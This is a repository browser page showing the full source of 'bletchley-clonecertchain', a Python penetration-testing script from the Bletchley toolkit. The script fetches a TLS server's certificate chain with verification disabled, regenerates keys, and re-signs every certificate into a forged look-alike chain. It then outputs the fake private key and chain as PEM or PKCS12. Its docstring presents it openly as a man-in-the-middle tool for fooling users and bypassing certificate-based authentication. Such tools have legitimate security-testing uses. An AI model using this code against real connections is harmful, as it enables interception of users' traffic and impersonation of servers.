Context Navigation

source: trunk/bin/bletchley-clonecertchain @ 78

Last change on this file since 78 was 75, checked in by tim, 10 years ago
more improvements to handshake
Property svn:executable set to ``*
File size: 8.9 KB

Rev	Line
[72]	1	#!/usr/bin/env python3
[73]	2	#-- mode: Python;--
	3	#
[72]	4	# Requires Python 3+
	5
[73]	6
[72]	7	'''
	8	An experimental script which attempts to clone a server certificate's entire
	9	certificate chain, ideally altering only the keys and signatures along the
	10	way.
	11
	12	This is useful in a few man-in-the-middle attack situations, including:
	13	- You swap out certificates on a user and the manually inspect the certificate
	14	properties before accepting them. Identical properties are more convincing.
	15
	16	- A product includes special-purpose certificate properties that are validated
	17	with custom procedures (e.g. client user name, product serial number, ...).
	18	If these properties are validated but the certificate's CA isn't, then cloning
	19	the full set of certificate properties is essential to bypass the
	20	authentication.
	21
	22	Currently, this script is somewhat limited and buggy, but will hopefully
	23	improve over time. Patches welcome!
	24
	25
	26	Copyright (C) 2014 Blindspot Security LLC
	27	Author: Timothy D. Morgan
	28
	29	This program is free software: you can redistribute it and/or modify
	30	it under the terms of the GNU Lesser General Public License, version 3,
	31	as published by the Free Software Foundation.
	32
	33	This program is distributed in the hope that it will be useful,
	34	but WITHOUT ANY WARRANTY; without even the implied warranty of
	35	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
	36	GNU General Public License for more details.
	37
	38	You should have received a copy of the GNU General Public License
	39	along with this program. If not, see <http://www.gnu.org/licenses/>.
	40	'''
	41
	42	import sys
	43	import argparse
	44	import traceback
	45	import socket
	46	try:
	47	import OpenSSL
	48	from OpenSSL import SSL
	49	except:
	50	sys.stderr.write('ERROR: Could not locate pyOpenSSL module. Under Debian-based systems, try:\n')
	51	sys.stderr.write(' # apt-get install python3-openssl\n')
	52	sys.stderr.write('NOTE: pyOpenSSL version 0.14 or later is required!\n')
	53	sys.exit(2)
	54
	55
[75]	56	def createClientContext(method=SSL.SSLv3_METHOD):
	57	tlsClientContext = SSL.Context(method)
[72]	58	tlsClientContext.set_verify(SSL.VERIFY_NONE, (lambda a,b,c,d,e: True))
	59	return tlsClientContext
	60
	61
	62	def fetchCertificateChain(host, port):
[75]	63	protocols = [SSL.SSLv23_METHOD, SSL.TLSv1_METHOD,
	64	SSL.TLSv1_1_METHOD, SSL.TLSv1_2_METHOD,
	65	SSL.SSLv3_METHOD, SSL.SSLv2_METHOD]
	66
	67	chain = None
	68	for p in protocols:
	69	serverSock = socket.socket()
	70	serverSock.connect((host,port))
[72]	71
[75]	72	try:
	73	server = SSL.Connection(createClientContext(p), serverSock)
	74	server.set_connect_state()
	75	server.do_handshake()
	76	except Exception as e:
	77	sys.stderr.write("Exception during handshake with server: \n")
	78	traceback.print_exc(file=sys.stderr)
	79	sys.stderr.write("\nThis could happen because the server requires "
	80	"certain SSL/TLS versions or a client certificiate."
	81	" Have no fear, we'll keep trying...\n\n")
[72]	82
[75]	83	chain = server.get_peer_cert_chain()
	84	if chain:
	85	return chain
[72]	86
[75]	87	return chain
	88
	89
[72]	90	def normalizeCertificateName(cert_name):
	91	n = cert_name.get_components()
	92	n.sort()
	93	return tuple(n)
	94
	95
	96	def normalizeCertificateChain(chain):
	97	# Organize certificates by subject and issuer for quick lookups
	98	subject_table = {}
	99	issuer_table = {}
	100	for c in chain:
	101	subject_table[normalizeCertificateName(c.get_subject())] = c
	102	issuer_table[normalizeCertificateName(c.get_issuer())] = c
	103
	104	# Now find root or highest-level intermediary
	105	root = None
	106	for c in chain:
	107	i = normalizeCertificateName(c.get_issuer())
	108	s = normalizeCertificateName(c.get_subject())
	109	if (i == s) or (i not in subject_table):
	110	if root != None:
	111	sys.stderr.write("WARN: Multiple root certificates found or broken certificate chain detected.")
	112	else:
	113	# Go with the first identified "root", since that's more likely to link up with the server cert
	114	root = c
	115
	116	# Finally, build the chain from the top-down in the correct order
	117	new_chain = []
	118	nxt = root
	119	while nxt != None:
	120	new_chain = [nxt] + new_chain
	121	s = normalizeCertificateName(nxt.get_subject())
	122	nxt = issuer_table.get(s)
	123
	124	return new_chain
	125
	126
	127	def genFakeKey(certificate):
	128	fake_key = OpenSSL.crypto.PKey()
	129	old_pubkey = certificate.get_pubkey()
	130	fake_key.generate_key(old_pubkey.type(), old_pubkey.bits())
	131
	132	return fake_key
	133
	134
	135	def getDigestAlgorithm(certificate):
	136	# XXX: ugly hack because pyopenssl API for this is limited
	137	if b'md5' in certificate.get_signature_algorithm():
	138	return 'md5'
	139	else:
	140	return 'sha1'
	141
	142
	143	def deleteExtension(certificate, index):
	144	import cffi
	145	from cffi import FFI
	146	ffi = FFI()
	147	ffi.cdef('''void* X509_delete_ext(void* x, int loc);''')
	148	libssl = ffi.dlopen('libssl.so')
	149	ext = libssl.X509_delete_ext(certificate._x509, index)
	150	#XXX: supposed to free ext here
	151
	152
	153	def removePeskyExtensions(certificate):
	154	#for index in range(0,certificate.get_extension_count()):
	155	# e = certificate.get_extension(index)
	156	# print("extension %d: %s\n" % (index, e.get_short_name()), e)
	157
	158	index = 0
	159	while index < certificate.get_extension_count():
	160	e = certificate.get_extension(index)
	161	if e.get_short_name() in (b'subjectKeyIdentifier', b'authorityKeyIdentifier'):
	162	deleteExtension(certificate, index)
	163	#XXX: would be nice if each of these extensions were re-added with appropriate values
	164	index -= 1
	165	index += 1
	166
	167	#for index in range(0,certificate.get_extension_count()):
	168	# e = certificate.get_extension(index)
	169	# print("extension %d: %s\n" % (index, e.get_short_name()), e)
	170
	171
	172	def genFakeCertificateChain(cert_chain):
	173	ret_val = []
	174	cert_chain.reverse() # start with highest level authority
	175
	176	c = cert_chain[0]
	177	i = normalizeCertificateName(c.get_issuer())
	178	s = normalizeCertificateName(c.get_subject())
	179	if s != i:
	180	# XXX: consider retrieving root locally and including a forged version instead
	181	c.set_issuer(c.get_subject())
	182	k = genFakeKey(c)
	183	c.set_pubkey(k)
	184	removePeskyExtensions(c)
	185	c.sign(k, getDigestAlgorithm(c))
	186	ret_val.append(c)
	187
	188	prev = k
	189	for c in cert_chain[1:]:
	190	k = genFakeKey(c)
	191	c.set_pubkey(k)
	192	removePeskyExtensions(c)
	193	c.sign(prev, getDigestAlgorithm(c))
	194	prev = k
	195	ret_val.append(c)
	196
	197	ret_val.reverse()
	198	return k,ret_val
	199
	200
	201	parser = argparse.ArgumentParser(
	202	description="An experimental script which attempts to clone an SSL server's"
	203	" entire certificate chain, ideally altering only the keys and signatures"
[73]	204	" along the way. The script prints results to stdout, starting with a PKCS7 (PEM)"
[72]	205	" key (the fake server private key) followed by the newly forged certificate"
	206	" chain, also in PEM format. (The new intermediate and root private keys are"
[73]	207	" not currently printed, but will likely be somehow available in a future"
[72]	208	" version.)")
	209
	210	parser.add_argument('host', nargs=1, default=None,
	211	help='IP address or host name of server')
[73]	212	parser.add_argument('port', nargs='?', type=int, default=443,
[72]	213	help='TCP port number of SSL service (default: 443)')
[73]	214	parser.add_argument(
	215	'--p12', dest='p12_filename', type=str, required=False, default=None,
	216	help='If specified, a PKCS12 file will be written with the generated certificates'
	217	' and server key (in addition to normal PKCS7 output). NOTE: the file specified'
	218	' will be overwritten without prompting if it already exists.')
	219	parser.add_argument(
	220	'--p12password', dest='p12_password', type=str, required=False, default='bletchley',
	221	help='If specified along with the --p12 argument, the PKCS12 file will use this password'
	222	' to encrypt the server private key. (Otherwise, the password "bletchley" is used).')
[72]	223	options = parser.parse_args()
	224
	225	#print("REAL CHAIN:")
	226	chain = fetchCertificateChain(options.host[0],options.port)
	227	#for c in chain:
	228	# print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8'))
	229
	230	#chain = normalizeCertificateChain(chain)
	231	#for c in chain:
	232	# print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8'))
	233
	234	#print("FAKE KEY AND CHAIN:")
[74]	235	if not chain:
	236	sys.stderr.write("ERROR: Could not retrieve server certificate\n\n")
	237	sys.exit(2)
	238
[72]	239	fake_key, fake_chain = genFakeCertificateChain(chain)
	240	print(OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, fake_key).decode('utf-8'))
	241	for c in fake_chain:
	242	print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8'))
[73]	243
	244	if options.p12_filename:
	245	p12_file = open(options.p12_filename, 'w+b')
	246
	247	p12 = OpenSSL.crypto.PKCS12()
	248	p12.set_ca_certificates(fake_chain[1:])
	249	p12.set_privatekey(fake_key)
	250	p12.set_certificate(fake_chain[0])
	251
	252	p12_file.write(p12.export(passphrase=options.p12_password.encode('utf-8')))
	253	p12_file.close()

Note: See TracBrowser for help on using the repository browser.

Download in other formats: